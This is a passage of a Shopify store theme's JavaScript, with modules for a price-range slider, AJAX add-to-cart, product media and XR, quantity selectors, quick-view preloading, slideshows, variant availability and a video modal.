      });
  
      // Add class `unloading` to body for page transition on all
      // anchor tags, unless they have `js-no-transition` class
      document.querySelectorAll('a:not(.js-no-transition)').forEach(el => {
        el.addEventListener('click', function(evt) {
          if (evt.metaKey) return true;
          evt.preventDefault();
          document.body.classList.add('unloading');
          var src = el.getAttribute('href');
          window.setTimeout(function() {
            location.href = src;
          }, 50);
        });
      });
  
      // Close the mobile nav drawer after clicking on a nav link
      document.querySelectorAll('a.mobile-nav__link').forEach(el => {
        el.addEventListener('click', function() {
          theme.NavDrawer.close();
        })
      });
    }
  };
  
  if (typeof window.noUiSlider === 'undefined') {
    throw new Error('theme.PriceRange is missing vendor noUiSlider: // =require vendor/nouislider.js');
  }
  
  theme.PriceRange = (function () {
    var defaultStep = 10;
    var selectors = {
      priceRange: '.price-range',
      priceRangeSlider: '.price-range__slider',
      priceRangeInputMin: '.price-range__input-min',
      priceRangeInputMax: '.price-range__input-max',
      priceRangeDisplayMin: '.price-range__display-min',
      priceRangeDisplayMax: '.price-range__display-max',
    };
  
    function PriceRange(container, {onChange, onUpdate, ...sliderOptions} = {}) {
      this.container = container;
      this.onChange = onChange;
      this.onUpdate = onUpdate;
      this.sliderOptions = sliderOptions || {};
  
      return this.init();
    }
  
    PriceRange.prototype = Object.assign({}, PriceRange.prototype, {
      init: function () {
        if (!this.container.classList.contains('price-range')) {
          throw new Error('You must instantiate PriceRange with a valid container')
        }
  
        this.formEl = this.container.closest('form');
        this.sliderEl = this.container.querySelector(selectors.priceRangeSlider);
        this.inputMinEl = this.container.querySelector(selectors.priceRangeInputMin);
        this.inputMaxEl = this.container.querySelector(selectors.priceRangeInputMax);
        this.displayMinEl = this.container.querySelector(selectors.priceRangeDisplayMin);
        this.displayMaxEl = this.container.querySelector(selectors.priceRangeDisplayMax);
  
        this.minRange = parseFloat(this.container.dataset.min) || 0;
        this.minValue = parseFloat(this.container.dataset.minValue) || 0;
        this.maxRange = parseFloat(this.container.dataset.max) || 100;
        this.maxValue = parseFloat(this.container.dataset.maxValue) || this.maxRange;
  
        return this.createPriceRange();
      },
  
      createPriceRange: function () {
        if (this.sliderEl && this.sliderEl.noUiSlider && typeof this.sliderEl.noUiSlider.destroy === 'function') {
          this.sliderEl.noUiSlider.destroy();
        }
  
        var slider = noUiSlider.create(this.sliderEl, {
          connect: true,
          step: defaultStep,
          ...this.sliderOptions,
          // Do not allow overriding these options
          start: [this.minValue, this.maxValue],
          range: {
            min: this.minRange,
            max: this.maxRange,
          },
        });
  
        slider.on('update', values => {
          this.displayMinEl.innerHTML = theme.Currency.formatMoney(
            values[0],
            theme.settings.moneyFormat,
          );
          this.displayMaxEl.innerHTML = theme.Currency.formatMoney(
            values[1],
            theme.settings.moneyFormat,
          );
  
          if (this.onUpdate) {
            this.onUpdate(values);
          }
        });
  
        slider.on('change', values => {
          this.inputMinEl.value = values[0];
          this.inputMaxEl.value = values[1];
  
          if (this.onChange) {
            const formData = new FormData(this.formEl);
            this.onChange(formData);
          }
        });
  
        return slider;
      },
    });
  
    return PriceRange;
  })();
  
  theme.AjaxProduct = (function() {
    var status = {
      loading: false
    };
  
    function ProductForm(form, submit, args) {
      this.form = form;
      this.args = args;
  
      var submitSelector = submit ? submit : '.add-to-cart';
  
      if (this.form) {
        this.addToCart = form.querySelector(submitSelector);
        this.form.addEventListener('submit', this.addItemFromForm.bind(this));
      }
    };
  
    ProductForm.prototype = Object.assign({}, ProductForm.prototype, {
      addItemFromForm: function(evt, callback){
        evt.preventDefault();

        if (this.form.querySelector('[data-coming-soon]')) {
          return;
        }
  
        if (status.loading) {
          return;
        }
  
        // Loading indicator on add to cart button
        this.addToCart.classList.add('btn--loading');
  
        status.loading = true;
  
        var data = theme.utils.serialize(this.form);
  
        fetch(theme.routes.cartAdd, {
          method: 'POST',
          body: data,
          credentials: 'same-origin',
          headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
            'X-Requested-With': 'XMLHttpRequest'
          }
        })
        .then(response => response.json())
        .then(function(data) {
          
          document.dispatchEvent(new CustomEvent("globo.preorder.update.cart",{
            detail: {
              product: data
            }
        }))

          if (data.status === 422) {
            this.error(data);
          } else {
            var product = data;
            this.success(product);

            fetch('/cart.js')
            .then(response => response.text())
            .then((responseText) => {
            data = JSON.parse(responseText);
            var counterEl = document.querySelectorAll('.cart-items-count');
              counterEl.forEach((element) => {
                element.innerHTML = data.item_count
              })
            })
          }
  
          status.loading = false;
          this.addToCart.classList.remove('btn--loading');
  
          // Reload page if adding product from a section on the cart page
          if (document.body.classList.contains('template-cart')) {
            window.scrollTo(0, 0);
            location.reload();
          }
        }.bind(this));

      
      },
  
      success: function(product) {
        var errors = this.form.querySelector('.errors');
        if (errors) {
          errors.remove();
        }
  
        this.form.dispatchEvent(new CustomEvent('ajaxProduct:added', {
          detail: {
            product: product,
            addToCartBtn: this.addToCart
          },
          bubbles: true
        }));
  
        if (this.args && this.args.scopedEventId) {
          document.dispatchEvent(new CustomEvent('ajaxProduct:added:' + this.args.scopedEventId, {
            detail: {
              product: product,
              addToCartBtn: this.addToCart
            }
          }));
        }
      },
  
      error: function(error) {
        if (!error.description) {
          console.warn(error);
          return;
        }
  
        var errors = this.form.querySelector('.errors');
        if (errors) {
          errors.remove();
        }
  
        var errorDiv = document.createElement('div');
        errorDiv.classList.add('errors', 'text-center');
  
        if (typeof error.description === 'object') {
          errorDiv.textContent = error.message;
        } else {
          errorDiv.textContent = error.description;
        }
  
        this.form.append(errorDiv);
  
        this.form.dispatchEvent(new CustomEvent('ajaxProduct:error', {
          detail: {
            errorMessage: error.description
          },
          bubbles: true
        }));
  
        if (this.args && this.args.scopedEventId) {
          document.dispatchEvent(new CustomEvent('ajaxProduct:error:' + this.args.scopedEventId, {
            detail: {
              errorMessage: error.description
            }
          }));
        }
      }
    });
  
    return ProductForm;
  })();
  
  theme.ProductMedia = (function() {
    var modelJsonSections = {};
    var models = {};
    var xrButtons = {};
  
    var selectors = {
      mediaGroup: '[data-product-single-media-group]',
      xrButton: '[data-shopify-xr]'
    };
  
    function init(modelViewerContainers, sectionId) {
      modelJsonSections[sectionId] = {
        loaded: false
      };
  
      modelViewerContainers.forEach(function(container, index) {
        var mediaId = container.dataset.mediaId;
        var modelViewerElement = container.querySelector('model-viewer');
        var modelId = modelViewerElement.dataset.modelId;
  
        if (index === 0) {
          var mediaGroup = container.closest(selectors.mediaGroup);
          var xrButton = mediaGroup.querySelector(selectors.xrButton);
          xrButtons[sectionId] = {
            element: xrButton,
            defaultId: modelId
          };
        }
  
        models[mediaId] = {
          modelId: modelId,
          sectionId: sectionId,
          container: container,
          element: modelViewerElement
        };
  
      });
  
      window.Shopify.loadFeatures([
        {
          name: 'shopify-xr',
          version: '1.0',
          onLoad: setupShopifyXr
        },
        {
          name: 'model-viewer-ui',
          version: '1.0',
          onLoad: setupModelViewerUi
        }
      ]);
  
      theme.LibraryLoader.load('modelViewerUiStyles');
    }
  
    function setupShopifyXr(errors) {
      if (errors) return;
  
      if (!window.ShopifyXR) {
        document.addEventListener('shopify_xr_initialized', function() {
          setupShopifyXr();
        });
        return;
      }
  
      for (var sectionId in modelJsonSections) {
        if (modelJsonSections.hasOwnProperty(sectionId)) {
          var modelSection = modelJsonSections[sectionId];
  
          if (modelSection.loaded) continue;
  
          var modelJson = document.querySelector('#ModelJson-' + sectionId);
  
          window.ShopifyXR.addModels(JSON.parse(modelJson.innerHTML));
          modelSection.loaded = true;
        }
      }
      window.ShopifyXR.setupXRElements();
    }
  
    function setupModelViewerUi(errors) {
      if (errors) return;
  
      for (var key in models) {
        if (models.hasOwnProperty(key)) {
          var model = models[key];
          if (!model.modelViewerUi && Shopify) {
            model.modelViewerUi = new Shopify.ModelViewerUI(model.element);
          }
          setupModelViewerListeners(model);
        }
      }
    }
  
    function setupModelViewerListeners(model) {
      var xrButton = xrButtons[model.sectionId];
  
      model.container.addEventListener('mediaVisible', function(event) {
        xrButton.element.setAttribute('data-shopify-model3d-id', model.modelId);
        if (theme.config.isTouch) return;
        if (!event.detail.autoplayMedia) return;
        model.modelViewerUi.play();
      });
  
      model.container.addEventListener('mediaHidden', function() {
        xrButton.element.setAttribute('data-shopify-model3d-id', xrButton.defaultId);
        model.modelViewerUi.pause();
      });
  
      model.container.addEventListener('xrLaunch', function() {
        model.modelViewerUi.pause();
      });
    }
  
    function removeSectionModels(sectionId) {
      for (var key in models) {
        if (models.hasOwnProperty(key)) {
          var model = models[key];
          if (model.sectionId === sectionId) {
            delete models[key];
          }
        }
      }
      delete modelJsonSections[sectionId];
    }
  
    return {
      init: init,
      removeSectionModels: removeSectionModels
    };
  })();
  
  theme.QtySelector = (function() {
    var selectors = {
      input: '.js-qty__num',
      plus: '.js-qty__adjust--plus',
      minus: '.js-qty__adjust--minus'
    };
  
    function QtySelector(el, options) {
      this.wrapper = el;
      this.plus = el.querySelector(selectors.plus);
      this.minus = el.querySelector(selectors.minus);
      this.input = el.querySelector(selectors.input);
      this.minValue = this.input.getAttribute('min') || 1;
  
      var defaults = {
        namespace: null,
        isCart: false,
        key: this.input.dataset.id
      };
  
      this.options = Object.assign({}, defaults, options);
  
      this.init();
    }
  
    QtySelector.prototype = Object.assign({}, QtySelector.prototype, {
      init: function() {
        this.plus.addEventListener('click', function() {
          var qty = this._getQty();
          this._change(qty + 1);
          if(this.plus.classList.contains('cart-drawer-quantity-btn')){
            fetch('/cart.js')
            .then(response => response.text())
            .then((responseText) => {
            let data = JSON.parse(responseText);
            var counterEl = document.querySelectorAll('.cart-items-count');
              counterEl.forEach((element) => {
                element.innerHTML = data.item_count + 1
              })
            });
          }
          // var cartCount = document.querySelector('.cart-items-count');
          // var counterEl = Number(cartCount.innerText);
          // counterEl = counterEl + 1;
          // cartCount.innerText = counterEl;
        }.bind(this));
  
        this.minus.addEventListener('click', function() {
          var qty = this._getQty();
          this._change(qty - 1);
          if(this.minus.classList.contains('cart-drawer-quantity-btn')){
            fetch('/cart.js')
            .then(response => response.text())
            .then((responseText) => {
            let data = JSON.parse(responseText);
            var counterEl = document.querySelectorAll('.cart-items-count');
              counterEl.forEach((element) => {
                element.innerHTML = data.item_count = 0 ? 0 : data.item_count - 1;
              })
            })
          }
          // var cartCount = document.querySelector('.cart-items-count');
          // var counterEl = Number(cartCount.innerText);
          // counterEl = counterEl = 0 ? 0 : counterEl - 1;
          // cartCount.innerText = counterEl;
        }.bind(this));
  
        this.input.addEventListener('change', function(evt) {
          this._change(this._getQty());
        }.bind(this));
      },
  
      _getQty: function() {
        var qty = this.input.value;
        if((parseFloat(qty) == parseInt(qty)) && !isNaN(qty)) {
          // We have a valid number!
        } else {
          // Not a number. Default to 1.
          qty = 1;
        }
        return parseInt(qty);
      },
  
      _change: function(qty) {
        if (qty <= this.minValue) {
          qty = this.minValue;
        }
  
        this.input.value = qty;
  
        if (this.options.isCart) {
          document.dispatchEvent(new CustomEvent('cart:quantity' + this.options.namespace, {
              detail: [this.options.key, qty, this.wrapper]
          }));
        }

      }
    });
  
    return QtySelector;
  })();
  
  theme.initQuickShop = function() {
    var ids = [];
    var products = document.querySelectorAll('.grid-product');

    if (!products.length || !theme.settings.quickView) {
      return;
    }

    products.forEach(product => {
      product.addEventListener('mouseover', productMouseover);
      product.addEventListener('focusin', productMouseover);
    });

    function productMouseover(evt) {
      var el = evt.currentTarget;
      // No quick view on mobile breakpoint (mobile uses tap-to-load instead)
      if (!theme.config.bpSmall) {
        el.removeEventListener('mouseover', productMouseover);
        el.removeEventListener('focusin', productMouseover);
        if (!el || !el.dataset.productId) {
          // Onboarding product, no real data
          return;
        }
        // product-builder tagged products redirect to PDP instead of Quick View
        if (el.dataset.skipQuickView) {
          return;
        }
        var productId = el.dataset.productId;
        var handle = el.dataset.productHandle;
        var btn = el.querySelector('.quick-product__btn');
        theme.preloadProductModal(handle, productId, btn);
      }
    }

    if (!theme._quickShopPreloadClickBound) {
      theme._quickShopPreloadClickBound = true;
      document.addEventListener('click', function quickViewPreloadOnClick(evt) {
        if (!theme.settings.quickView) return;
        var btn = evt.target.closest('.grid-product .quick-product__btn');
        if (!btn || !btn.classList.contains('quick-product__btn--not-ready')) return;
        var gridProduct = evt.target.closest('.grid-product');
        if (!gridProduct || !gridProduct.dataset.productId || gridProduct.dataset.skipQuickView) return;
        evt.preventDefault();
        evt.stopPropagation();
        var productId = gridProduct.dataset.productId;
        var handle = gridProduct.dataset.productHandle;
        theme.preloadProductModal(handle, productId, btn, function() {
          btn.click();
        });
      }, true);
    }
  };
  
  theme.preloadProductModal = function(handle, productId, btn, onReadyCallback) {
    // One preload per product. A second call (another card for the same product,
    // or hover then click) used to rebuild the holder and run `new theme.Modals`
    // and `sections.register` again, leaving two open listeners on the modal:
    // every open then ran its setup twice (two Flickity sliders, ~300ms each).
    theme._quickShopPreloads = theme._quickShopPreloads || {};
    var preload = theme._quickShopPreloads[productId];
    var waiter = { btn: btn, callback: onReadyCallback };

    if (preload) {
      if (preload.ready) {
        if (waiter.btn) waiter.btn.classList.remove('quick-product__btn--not-ready');
        if (typeof waiter.callback === 'function') waiter.callback();
      } else {
        preload.waiters.push(waiter);
      }
      return;
    }

    preload = theme._quickShopPreloads[productId] = { ready: false, waiters: [waiter] };

    var holder = document.getElementById('QuickShopHolder-' + handle);
    var url = theme.routes.home + '/products/' + handle + '?view=modal';

    // remove double `/` in case shop might have /en or language in URL
    url = url.replace('//', '/');

    fetch(url)
    .then(response => response.text())
    .then(text => {
      const html = document.createElement('div');
      html.innerHTML = text;
      const div = html.querySelector('.product-section[data-product-handle="'+handle+'"]');

      if (!holder) {
        delete theme._quickShopPreloads[productId];
        return;
      }

      holder.innerHTML = '';
      holder.append(div);

      // Setup quick view modal
      var modalId = 'QuickShopModal-' + productId;
      var name = 'quick-modal-' + productId;
      new theme.Modals(modalId, name, { rootClasses: false });

      // Register product template inside quick view
      theme.sections.register('product', theme.Product, holder);

      // Register collapsible elements
      theme.collapsibles.init(holder);

      if (theme.productAccordion && typeof theme.productAccordion.init === 'function') {
        theme.productAccordion.init(holder);
      }

      // Register potential video modal links (when video has sound)
      theme.videoModal();

      preload.ready = true;
      preload.waiters.forEach(function(w) {
        if (w.btn) {
          w.btn.classList.remove('quick-product__btn--not-ready');
        }
        if (typeof w.callback === 'function') {
          w.callback();
        }
      });

      document.dispatchEvent(new CustomEvent('quickview:loaded', {
        detail: {
          productId: productId,
          handle: handle
        }
      }));
    })
    .catch(function(error) {
      delete theme._quickShopPreloads[productId];
      throw error;
    });
  }
  
  // theme.Slideshow handles all flickity based sliders
  // Child navigation is only setup to work on product images
  theme.Slideshow = (function() {
    var classes = {
      animateOut: 'animate-out',
      isPaused: 'is-paused',
      isActive: 'is-active'
    };
  
    var selectors = {
      allSlides: '.slideshow__slide',
      currentSlide: '.is-selected',
      wrapper: '.slideshow-wrapper',
      pauseButton: '.slideshow__pause'
    };
  
    var productSelectors = {
      thumb: '.product__thumb-item:not(.hide)',
      links: '.product__thumb-item:not(.hide) a',
      arrow: '.product__thumb-arrow'
    };
  
    var defaults = {
      adaptiveHeight: false,
      autoPlay: false,
      avoidReflow: false, // custom by Archetype
      childNav: null, // element. Custom by Archetype instead of asNavFor
      childNavScroller: null, // element
      childVertical: false,
      dragThreshold: 7,
      fade: false,
      friction: 0.8,
      initialIndex: 0,
      pageDots: false,
      pauseAutoPlayOnHover: false,
      prevNextButtons: false,
      rightToLeft: theme.config.rtl,
      selectedAttraction: 0.14,
      setGallerySize: true,
      wrapAround: true
    };
  
    function slideshow(el, args) {
      this.el = el;
      this.args = Object.assign({}, defaults, args);
  
      // Setup listeners as part of arguments
      this.args.on = {
        ready: this.init.bind(this),
        change: this.slideChange.bind(this),
        settle: this.afterChange.bind(this)
      };
  
      if (this.args.childNav) {
        this.childNavEls = this.args.childNav.querySelectorAll(productSelectors.thumb);
        this.childNavLinks = this.args.childNav.querySelectorAll(productSelectors.links);
        this.arrows = this.args.childNav.querySelectorAll(productSelectors.arrow);
        if (this.childNavLinks.length) {
          this.initChildNav();
        }
      }
  
      if (this.args.avoidReflow) {
        avoidReflow(el);
      }
  
      this.slideshow = new Flickity(el, this.args);
  
      // Prevent dragging on the product slider from triggering a zoom on product images
      if (el.dataset.zoom && el.dataset.zoom === 'true') {
        this.slideshow.on('dragStart', () => {
          this.slideshow.slider.style.pointerEvents = 'none';
  
          // With fade enabled, we also need to adjust the pointerEvents on the selected slide
          if (this.slideshow.options.fade) {
            this.slideshow.slider.querySelector('.is-selected').style.pointerEvents = 'none';
          }
        });
        this.slideshow.on('dragEnd', () => {
          this.slideshow.slider.style.pointerEvents = 'auto';
  
          // With fade enabled, we also need to adjust the pointerEvents on the selected slide
          if (this.slideshow.options.fade) {
            this.slideshow.slider.querySelector('.is-selected').style.pointerEvents = 'auto';
          }
        });
      }
  
      if (this.args.autoPlay) {
        var wrapper = el.closest(selectors.wrapper);
        this.pauseBtn = wrapper.querySelector(selectors.pauseButton);
        if (this.pauseBtn) {
          this.pauseBtn.addEventListener('click', this._togglePause.bind(this));
        }
      }
  
      // Reset dimensions on resize
      window.on('resize', theme.utils.debounce(300, function() {
        this.resize();
      }.bind(this)));
  
      // Set flickity-viewport height to first element to
      // avoid awkward page reflows while initializing.
      // Must be added in a `style` tag because element does not exist yet.
      // Slideshow element must have an ID
      function avoidReflow(el) {
        if (!el.id) return;
        var firstChild = el.firstChild;
        while(firstChild != null && firstChild.nodeType == 3){ // skip TextNodes
          firstChild = firstChild.nextSibling;
        }
        // Skip when height isn't ready yet (hidden panel / unloaded images).
        // Locking height:0px into a stylesheet causes collapsed switcher rows.
        if (!firstChild || firstChild.offsetHeight < 100) return;
        // Reserve the first cell's real height only — a fixed 450px floor
        // was locking collection switchers taller than any product card.
        const reserved = firstChild.offsetHeight;
        const style = document.createElement('style');
        style.setAttribute('data-flickity-avoid-reflow', el.id);
        style.innerHTML = `#${el.id} .flickity-viewport{min-height:${reserved}px}`;
        document.head.appendChild(style);
      }
    }
  
    slideshow.prototype = Object.assign({}, slideshow.prototype, {
      init: function(el) {
        this.currentSlide = this.el.querySelector(selectors.currentSlide);
  
        // Optional onInit callback
        if (this.args.callbacks && this.args.callbacks.onInit) {
          if (typeof this.args.callbacks.onInit === 'function') {
            this.args.callbacks.onInit(this.currentSlide);
          }
        }
  
        if (window.AOS) { AOS.refresh() }
      },
  
      slideChange: function(index) {
        // Outgoing fade styles
        if (this.args.fade && this.currentSlide) {
          this.currentSlide.classList.add(classes.animateOut);
          this.currentSlide.addEventListener('transitionend', function() {
            this.currentSlide.classList.remove(classes.animateOut);
          }.bind(this));
        }
  
        // Match index with child nav
        if (this.args.childNav) {
          this.childNavGoTo(index);
        }
  
        // Optional onChange callback
        if (this.args.callbacks && this.args.callbacks.onChange) {
          if (typeof this.args.callbacks.onChange === 'function') {
            this.args.callbacks.onChange(index);
          }
        }
  
        // Show/hide arrows depending on selected index
        if (this.arrows && this.arrows.length) {
          this.arrows[0].classList.toggle('hide', index === 0);
          this.arrows[1].classList.toggle('hide', index === (this.childNavLinks.length - 1));
        }
      },
      afterChange: function(index) {
        // Remove all fade animation classes after slide is done
        if (this.args.fade) {
          this.el.querySelectorAll(selectors.allSlides).forEach(slide => {
            slide.classList.remove(classes.animateOut);
          });
        }
  
        this.currentSlide = this.el.querySelector(selectors.currentSlide);
  
        // Match index with child nav (in case slider height changed first)
        if (this.args.childNav) {
          this.childNavGoTo(this.slideshow.selectedIndex);
        }
      },
      destroy: function() {
        if (this.args.childNav && this.childNavLinks.length) {
          this.childNavLinks.forEach(a => {
            a.classList.remove(classes.isActive);
          });
        }
  
        this.slideshow.destroy();
      },
      reposition: function() {
        this.slideshow.reposition();
      },
      _togglePause: function() {
        if (this.pauseBtn.classList.contains(classes.isPaused)) {
          this.pauseBtn.classList.remove(classes.isPaused);
          this.slideshow.playPlayer();
        } else {
          this.pauseBtn.classList.add(classes.isPaused);
          this.slideshow.pausePlayer();
        }
      },
      resize: function() {
        this.slideshow.resize();
      },
      play: function() {
        this.slideshow.playPlayer();
      },
      pause: function() {
        this.slideshow.pausePlayer();
      },
      goToSlide: function(i) {
        this.slideshow.select(i);
      },
      setDraggable: function(enable) {
        this.slideshow.options.draggable = enable;
        this.slideshow.updateDraggable();
      },
  
      initChildNav: function() {
        this.childNavLinks[this.args.initialIndex].classList.add('is-active');
  
        // Setup events
        this.childNavLinks.forEach((link, i) => {
          // update data-index because image-set feature may be enabled
          link.setAttribute('data-index', i);
  
          link.addEventListener('click', function(evt) {
            evt.preventDefault();
            this.goToSlide(this.getChildIndex(evt.currentTarget))
          }.bind(this));
          link.addEventListener('focus', function(evt) {
            this.goToSlide(this.getChildIndex(evt.currentTarget))
          }.bind(this));
          link.addEventListener('keydown', function(evt) {
            if (evt.keyCode === 13) {
              this.goToSlide(this.getChildIndex(evt.currentTarget))
            }
          }.bind(this));
        });
  
        // Setup optional arrows
        if (this.arrows.length) {
          this.arrows.forEach(arrow => {
            arrow.addEventListener('click', this.arrowClick.bind(this));
          });;
        }
      },
  
      getChildIndex: function(target) {
        return parseInt(target.dataset.index);
      },
  
      childNavGoTo: function(index) {
        this.childNavLinks.forEach(a => {
          a.blur();
          a.classList.remove(classes.isActive);
        });
  
        var el = this.childNavLinks[index];
        el.classList.add(classes.isActive);
  
        if (!this.args.childNavScroller) {
          return;
        }
  
        if (this.args.childVertical) {
          var elTop = el.offsetTop;
          this.args.childNavScroller.scrollTop = elTop - 100;
        } else {
          var elLeft = el.offsetLeft;
          this.args.childNavScroller.scrollLeft = elLeft - 100;
        }
      },
  
      arrowClick: function(evt) {
        if (evt.currentTarget.classList.contains('product__thumb-arrow--prev')) {
          this.slideshow.previous();
        } else {
          this.slideshow.next();
        }
      }
    });
  
    return slideshow;
  })();
  
  /*============================================================================
    VariantAvailability
    - Cross out sold out or unavailable variants
    - To disable, use the Variant Picker Block setting
    - Required markup:
      - class=variant-input-wrap to wrap select or button group
      - class=variant-input to wrap button/label
  ==============================================================================*/
  
  theme.VariantAvailability = (function() {
    var classes = {
      disabled: 'disabled',
      hidden: 'variant-hidden'
    };

    function availability(args) {
      this.type = args.type;
      this.variantsObject = args.variantsObject;
      this.currentVariantObject = args.currentVariantObject;
      this.container = args.container;
      this.namespace = args.namespace;

      this.init();
    }

    availability.prototype = Object.assign({}, availability.prototype, {
      init: function() {
        this.container.on('variantChange' + this.namespace, this.setAvailability.bind(this));

        // Set default state based on current selected variant
        this.setInitialAvailability();
      },

      // Create a list of all options. If any variant exists and is in stock with that option, it's considered available
      createAvailableOptionsTree(variants, currentlySelectedValues) {
        // First, get all possible option values from the DOM (what's actually rendered)
        const allPossibleOptions = { option1: [], option2: [], option3: [] };
        
        this.container.querySelectorAll('.variant-input-wrap').forEach(group => {
          const optionIndex = group.dataset.index;
          if (!optionIndex) return;
          
          if (this.type === 'dropdown') {
            group.querySelectorAll('option').forEach(option => {
              if (option.value && !allPossibleOptions[optionIndex].find(o => o.value === option.value)) {
                allPossibleOptions[optionIndex].push({value: option.value, soldOut: true, exists: false});
              }
            });
          } else {
            group.querySelectorAll('.variant-input').forEach(input => {
              const value = input.dataset.value;
              if (value && !allPossibleOptions[optionIndex].find(o => o.value === value)) {
                allPossibleOptions[optionIndex].push({value: value, soldOut: true, exists: false});
              }
            });
          }
        });

        // Now reduce variant array and mark which combinations actually exist
        return variants.reduce((options, variant) => {

          // Check each option group (e.g. option1, option2, option3) of the variant
          Object.keys(options).forEach(index => {

            if (variant[index] === null) return;

            let entry = options[index].find(option => option.value === variant[index]);

            if (typeof entry === 'undefined') {
              // If option has yet to be added to the options tree, add it
              entry = {value: variant[index], soldOut: true, exists: false}
              options[index].push(entry);
            }

            const currentOption1 = currentlySelectedValues.find(({value, index}) => index === 'option1')
            const currentOption2 = currentlySelectedValues.find(({value, index}) => index === 'option2')

            switch (index) {
              case 'option1':
                // Option1 inputs should always remain enabled based on all available variants
                entry.soldOut = entry.soldOut && variant.available ? false : entry.soldOut;
                entry.exists = true; // Option1 always exists if in variant list
                break;
              case 'option2':
                // Option2 inputs should remain enabled based on available variants that match first option group
                if (currentOption1 && variant['option1'] === currentOption1.value) {
                  entry.soldOut = entry.soldOut && variant.available ? false : entry.soldOut;
                  entry.exists = true; // This combination exists
                }
                break;
              case 'option3':
                // Option 3 inputs should remain enabled based on available variants that match first and second option group
                if (
                  currentOption1 && variant['option1'] === currentOption1.value
                  && currentOption2 && variant['option2'] === currentOption2.value
                ) {
                  entry.soldOut = entry.soldOut && variant.available ? false : entry.soldOut;
                  entry.exists = true; // This combination exists
                }
                break;
            }
          })

          return options;
        }, allPossibleOptions)
      },
  
      setInitialAvailability: function() {
        this.container.querySelectorAll('.variant-input-wrap').forEach(group => {
          this.disableVariantGroup(group);
        });
  
        const currentlySelectedValues = this.currentVariantObject.options.map((value,index) => {return {value, index: `option${index+1}`}})
        const initialOptions = this.createAvailableOptionsTree(this.variantsObject, currentlySelectedValues, this.currentVariantObject);
  
        for (var [option, values] of Object.entries(initialOptions)) {
          this.manageOptionState(option, values);
        }
      },
  
      setAvailability: function(evt) {
  
        const {value: lastSelectedValue, index: lastSelectedIndex, currentlySelectedValues, variant} = evt.detail;
  
        // Object to hold all options by value.
        // This will be what sets a button/dropdown as
        // sold out or unavailable (not a combo set as purchasable)
        const valuesToManage = this.createAvailableOptionsTree(this.variantsObject, currentlySelectedValues, variant, lastSelectedIndex, lastSelectedValue)
  
        // Loop through all option levels and send each
        // value w/ args to function that determines to show/hide/enable/disable
        for (var [option, values] of Object.entries(valuesToManage)) {
          this.manageOptionState(option, values, lastSelectedValue);
        }
      },
  
      manageOptionState: function(option, values) {
        var group = this.container.querySelector('.variant-input-wrap[data-index="'+ option +'"]');
  
        // Loop through each option value
        values.forEach(obj => {
          this.enableVariantOption(group, obj);
        });
      },
  
      enableVariantOption: function(group, obj) {
        // Selecting by value so escape it
        var value = obj.value.replace(/([ #;&,.+*~\':"!^$[\]()=>|\/@])/g,'\\$1');

        if (this.type === 'dropdown') {
          var option = group.querySelector('option[value="'+ value +'"]');
          if (!option) return;

          // Hide non-existent combinations completely
          if (obj.exists === false) {
            option.disabled = true;
            option.style.display = 'none';
          } else if (obj.soldOut) {
            // Show but disable sold out variants
            option.disabled = true;
            option.style.display = '';
          } else {
            // Show and enable available variants
            option.disabled = false;
            option.style.display = '';
          }
        } else {
          var buttonGroup = group.querySelector('.variant-input[data-value="'+ value +'"]');
          if (!buttonGroup) return;

          var input = buttonGroup.querySelector('input');
          var label = buttonGroup.querySelector('label');

          // First, remove all previous states
          input.classList.remove(classes.disabled);
          label.classList.remove(classes.disabled);
          buttonGroup.classList.remove(classes.hidden);

          // Hide non-existent variant combinations completely
          if (obj.exists === false) {
            buttonGroup.classList.add(classes.hidden);
          } else if (obj.soldOut) {
            // Show but disable sold out variants (with strikethrough)
            input.classList.add(classes.disabled);
            label.classList.add(classes.disabled);
          }
          // If exists and not soldOut, variant is available (already shown with classes removed)
        }
      },
  
      disableVariantGroup: function(group) {
        if (this.type === 'dropdown') {
          group.querySelectorAll('option').forEach(option => {
            option.disabled = true;
            option.style.display = '';
          });
        } else {
          group.querySelectorAll('.variant-input').forEach(buttonGroup => {
            buttonGroup.classList.remove(classes.hidden);
          });
          group.querySelectorAll('input').forEach(input => {
            input.classList.add(classes.disabled);
          });
          group.querySelectorAll('label').forEach(label => {
            label.classList.add(classes.disabled);
          });
        }
      }
  
    });
  
    return availability;
  })();
  
  // Video modal will auto-initialize for any anchor link that points to YouTube
  // MP4 videos must manually be enabled with:
  //   - .product-video-trigger--mp4 (trigger button)
  //   - .product-video-mp4-sound video player element (cloned into modal)
  //     - see media.liquid for example of this
  theme.videoModal = function() {
    var youtubePlayer;
    var vimeoPlayer;
  
    var videoHolderId = 'VideoHolder';
    var selectors = {
      youtube: 'a[href*="youtube.com/watch"], a[href*="youtu.be/"]',
      vimeo: 'a[href*="player.vimeo.com/player/"], a[href*="vimeo.com/"]',
      mp4Trigger: '.product-video-trigger--mp4',
      mp4Player: '.product-video-mp4-sound'
    };
  
    var youtubeTriggers = document.querySelectorAll(selectors.youtube);
    var vimeoTriggers = document.querySelectorAll(selectors.vimeo);
    var mp4Triggers = document.querySelectorAll(selectors.mp4Trigger);
  
    if (!youtubeTriggers.length && !vimeoTriggers.length && !mp4Triggers.length) {
      return;
    }
  
    var videoHolderDiv = document.getElementById(videoHolderId);
  
    if (youtubeTriggers.length) {
      theme.LibraryLoader.load('youtubeSdk');
    }
  
    if (vimeoTriggers.length) {
      theme.LibraryLoader.load('vimeo', window.vimeoApiReady);
    }
  
    var modal = new theme.Modals('VideoModal', 'video-modal', {
      closeOffContentClick: true,
      bodyOpenClass: ['modal-open', 'video-modal-open'],
      solid: true
    });
  
    youtubeTriggers.forEach(btn => {
      btn.addEventListener('click', triggerYouTubeModal);
    });
  
    vimeoTriggers.forEach(btn => {
      btn.addEventListener('click', triggerVimeoModal);
    });
  
    mp4Triggers.forEach(btn => {
      btn.addEventListener('click', triggerMp4Modal);
    });
  
    document.addEventListener('modalClose.VideoModal', closeVideoModal);
  
    function triggerYouTubeModal(evt) {
      // If not already loaded, treat as normal link
      if (!theme.config.youTubeReady) {
        return;
      }
  
      evt.preventDefault();
      emptyVideoHolder();
  
      modal.open(evt);
  
      var videoId = getYoutubeVideoId(evt.currentTarget.getAttribute('href'));
      youtubePlayer = new theme.YouTube(
        videoHolderId,
        {
          videoId: videoId,
          style: 'sound',
          events: {
            onReady: onYoutubeReady
          }
        }
      );
    }
  
    function triggerVimeoModal(evt) {
      // If not already loaded, treat as normal link
      if (!theme.config.vimeoReady) {
        return;
      }
  
      evt.preventDefault();
      emptyVideoHolder();
  
      modal.open(evt);
  
